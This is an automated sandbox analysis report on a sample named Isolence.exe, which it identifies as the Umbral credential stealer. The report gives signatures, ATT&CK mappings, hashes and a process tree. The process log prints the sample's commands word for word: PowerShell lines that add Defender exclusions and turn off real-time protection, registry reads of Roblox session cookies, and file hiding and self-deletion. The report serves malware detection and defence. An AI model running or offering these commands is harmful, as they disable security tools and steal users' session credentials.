Overview

overview

10

Static

static

3

Isolence.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    36s
  • max time network
    37s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-09-2024 16:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Isolence.exe

  • Size

    402KB

  • MD5

    87e7cabc378978827ad35f11a7e3d311

  • SHA1

    eebf169bc83f6809229a8e2bd7925f99c216842f

  • SHA256

    441d5ad14a8d62643e2fe09046f6afe5b04b045c89dc3b213fcb695d5faa0063

  • SHA512

    2893da6232254d14d8038529e636f8178ef0b2143f640e6655de9186635b545d19713c843409840f8a1807adfe9ef10c344a42d448c9d71663f988d29467f039

  • SSDEEP

    6144:Vqg1BFe479zdJQxMh1PLm1Puu24ZmlLKSCbOymoeFKJCTownhl4K/X:Vx247OGQ3Z+WS2eVPnv4Kv

Score
10/10
umbralcredential_accessdefense_evasiondiscoveryexecutionspywarestealer

Malware Config

Signatures

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\Isolence.exe
    "C:\Users\Admin\AppData\Local\Temp\Isolence.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3056
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAZAB1ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHEAdABxACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAUgBlAHMAdABhAHIAdAAgAHAAYwAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAZABpAGIAIwA+AA=="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2700
    • C:\Users\Admin\AppData\Local\Temp\insolence.exe
      "C:\Users\Admin\AppData\Local\Temp\insolence.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3448
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3892
      • C:\Windows\SYSTEM32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\insolence.exe"
        3⤵
        • Views/modifies file attributes
        PID:3896
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\insolence.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3664
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4880
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5056
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3080
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2512
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
          PID:3532
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          3⤵
            PID:2064
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            PID:2372
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            3⤵
            • Detects videocard installed
            PID:1668
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\insolence.exe" && pause
            3⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Suspicious use of WriteProcessMemory
            PID:4476
            • C:\Windows\system32\PING.EXE
              ping localhost
              4⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:4164

      Network

      MITRE ATT&CK Enterprise v15

      Reconnaissance

      Resource Development

      Initial Access

      Execution

      Command and Scripting Interpreter

      1
      T1059

      PowerShell

      1
      T1059.001

      Persistence

      Privilege Escalation

      Defense Evasion

      Hide Artifacts

      1
      T1564

      Hidden Files and Directories

      1
      T1564.001

      Obfuscated Files or Information

      1
      T1027

      Command Obfuscation

      1
      T1027.010

      Credential Access

      Credentials from Password Stores

      1
      T1555

      Credentials from Web Browsers

      1
      T1555.003

      Unsecured Credentials

      1
      T1552

      Credentials In Files

      1
      T1552.001

      Discovery

      Query Registry

      1
      T1012

      Remote System Discovery

      1
      T1018

      System Information Discovery

      3
      T1082

      System Location Discovery

      1
      T1614

      System Language Discovery

      1
      T1614.001

      System Network Configuration Discovery

      1
      T1016

      Internet Connection Discovery

      1
      T1016.001

      Lateral Movement

      Collection

      Data from Local System

      1
      T1005

      Command and Control

      Web Service

      1
      T1102

      Exfiltration

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        440cb38dbee06645cc8b74d51f6e5f71

        SHA1

        d7e61da91dc4502e9ae83281b88c1e48584edb7c

        SHA256

        8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

        SHA512

        3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        d3235ed022a42ec4338123ab87144afa

        SHA1

        5058608bc0deb720a585a2304a8f7cf63a50a315

        SHA256

        10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27

        SHA512

        236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        45ad40f012b09e141955482368549640

        SHA1

        3f9cd15875c1e397c3b2b5592805577ae88a96cb

        SHA256

        ea3b59172f1a33677f9cb3843fb4d6093b806d3a7cf2f3c6d4692f5421f656ce

        SHA512

        3de08f8affca1c1450088f560776cf3d65146cadac43c06eb922c7b3cea436e519966cf38458303ffeb1a58c53f8952cffda6c34216fda7594e014b516e83b33

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        17KB

        MD5

        a7086c53bf5b092cbb3805505fc057e5

        SHA1

        0864afc317616687ea45301368677fb6b1d7a1fa

        SHA256

        7bfd82cf8ea25e638da7e89b6b0f6f2b3eda613d0ee6719d224bf1236b9192fc

        SHA512

        209eeb14f2e17e31cab2da39bf8dcbe63c24d819e1caac70e3be44c986e785b2ac3bfca2cff723a21bd475744fb6ae81aa8649f2c78fb73f7e20959fd635d974

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        4a154efa7af25bb8b94d0d9c7b4f15cd

        SHA1

        5e0e04103e4eef1bc7ef242b730aed1958f98e1f

        SHA256

        c216eda372556eb78e680bde247c2fd2085642ee33031905a213c6bec502ccce

        SHA512

        fc4678133318fe1952947be74e244246336c7faacc9b9ae32336d57b106ec8f044e5db41dd98e8f3a54270ddacab2fc84a66d5d67deeadc3056ea5213bcbbba4

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        948B

        MD5

        c65738617888921a153bd9b1ef516ee7

        SHA1

        5245e71ea3c181d76320c857b639272ac9e079b1

        SHA256

        4640ba4001fd16a593315299cbdd4988dc2c7075820687f1018aac40aca95c26

        SHA512

        2e2a0ebd93f9d8dd07a7599054bce232683e9add9a35e77b584618040bcfd84a42545352519ec4736cc379002210b6f3ed2d905591c6925c0981b0392b495bfa

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h0benlbv.hc5.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\insolence.exe
        Filesize

        229KB

        MD5

        7553d23f56459f7a00e0c4d0bafaf675

        SHA1

        625bed675494bcba3860b57680bef8e09ba7429d

        SHA256

        d385a83b02ae2e7a2357a17abaa909406a88ad720faee797ad3fb11bdcc31200

        SHA512

        a577a2c02960b8fdb4614cf41cbde3da6e22f548e2a100885f58d763cb5c38893a21d07ebdc2046890e0cb9fcede09f7dd935d713e35ae184d679766c9ac3b41

        Download Submit

      • memory/2700-47-0x0000000006B70000-0x0000000006B8A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/2700-16-0x0000000074B3E000-0x0000000074B3F000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2700-20-0x0000000006010000-0x0000000006076000-memory.dmp

        Filesize

        408KB

        Download

      • memory/2700-18-0x0000000005690000-0x00000000056B2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2700-30-0x0000000006080000-0x00000000063D4000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/2700-31-0x0000000006630000-0x000000000664E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/2700-32-0x0000000006660000-0x00000000066AC000-memory.dmp

        Filesize

        304KB

        Download

      • memory/2700-13-0x0000000005090000-0x00000000050C6000-memory.dmp

        Filesize

        216KB

        Download

      • memory/2700-17-0x0000000005800000-0x0000000005E28000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/2700-46-0x0000000007E80000-0x00000000084FA000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/2700-19-0x0000000005FA0000-0x0000000006006000-memory.dmp

        Filesize

        408KB

        Download

      • memory/2700-60-0x0000000007A20000-0x0000000007AB2000-memory.dmp

        Filesize

        584KB

        Download

      • memory/2700-15-0x00000000051C0000-0x00000000051D0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2700-59-0x0000000008AB0000-0x0000000009054000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/3448-14-0x00007FFAE2A10000-0x00007FFAE34D1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3448-65-0x0000018C1CD40000-0x0000018C1CDB6000-memory.dmp

        Filesize

        472KB

        Download

      • memory/3448-66-0x0000018C04300000-0x0000018C04350000-memory.dmp

        Filesize

        320KB

        Download

      • memory/3448-67-0x0000018C02A10000-0x0000018C02A2E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/3448-103-0x0000018C04350000-0x0000018C0435A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/3448-104-0x0000018C044B0000-0x0000018C044C2000-memory.dmp

        Filesize

        72KB

        Download

      • memory/3448-12-0x00007FFAE2A13000-0x00007FFAE2A15000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3448-11-0x0000018C02530000-0x0000018C02570000-memory.dmp

        Filesize

        256KB

        Download

      • memory/3448-125-0x00007FFAE2A10000-0x00007FFAE34D1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3664-45-0x0000022FEE060000-0x0000022FEE27C000-memory.dmp

        Filesize

        2.1MB

        Download

      • memory/3664-42-0x0000022FEE380000-0x0000022FEE3A2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4880-62-0x00000179EF1B0000-0x00000179EF3CC000-memory.dmp

        Filesize

        2.1MB

        Download